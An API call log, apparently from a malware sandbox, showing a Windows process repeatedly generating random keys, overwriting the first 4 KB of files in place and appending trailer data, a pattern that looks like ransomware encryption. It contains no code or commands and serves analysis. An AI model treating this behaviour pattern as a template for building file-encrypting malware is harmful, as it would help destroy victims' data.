1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.728] GetProcessHeap () returned 0x4f10000 [0081.728] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.728] SetFilePointerEx (in: hFile=0x894, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.728] WriteFile (in: hFile=0x894, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.729] WriteFile (in: hFile=0x894, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.729] GetProcessHeap () returned 0x4f10000 [0081.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.729] GetProcessHeap () returned 0x4f10000 [0081.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.729] GetProcessHeap () returned 0x4f10000 [0081.729] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.729] CloseHandle (hObject=0x894) returned 1 [0081.730] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 70 [0081.730] SetFilePointerEx (in: hFile=0x898, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.731] ReadFile (in: hFile=0x898, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.731] SetFilePointerEx (in: hFile=0x898, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.731] GetProcessHeap () returned 0x4f10000 [0081.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.731] GetProcessHeap () returned 0x4f10000 [0081.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.731] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.731] GetProcessHeap () returned 0x4f10000 [0081.731] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.731] ReadFile (in: hFile=0x898, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.779] SetFilePointerEx (in: hFile=0x898, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.779] WriteFile (in: hFile=0x898, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.779] GetProcessHeap () returned 0x4f10000 [0081.779] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.780] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.780] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.781] GetProcessHeap () returned 0x4f10000 [0081.781] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.782] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.782] GetProcessHeap () returned 0x4f10000 [0081.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.783] GetProcessHeap () returned 0x4f10000 [0081.783] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.783] SetFilePointerEx (in: hFile=0x898, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.784] WriteFile (in: hFile=0x898, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.784] WriteFile (in: hFile=0x898, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.784] GetProcessHeap () returned 0x4f10000 [0081.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.784] GetProcessHeap () returned 0x4f10000 [0081.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.784] GetProcessHeap () returned 0x4f10000 [0081.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.784] CloseHandle (hObject=0x898) returned 1 [0081.785] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 71 [0081.785] SetFilePointerEx (in: hFile=0x89c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.785] ReadFile (in: hFile=0x89c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.785] SetFilePointerEx (in: hFile=0x89c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.785] GetProcessHeap () returned 0x4f10000 [0081.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.785] GetProcessHeap () returned 0x4f10000 [0081.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.785] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.785] GetProcessHeap () returned 0x4f10000 [0081.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.785] ReadFile (in: hFile=0x89c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.832] SetFilePointerEx (in: hFile=0x89c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.832] WriteFile (in: hFile=0x89c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.833] GetProcessHeap () returned 0x4f10000 [0081.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.834] GetProcessHeap () returned 0x4f10000 [0081.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] 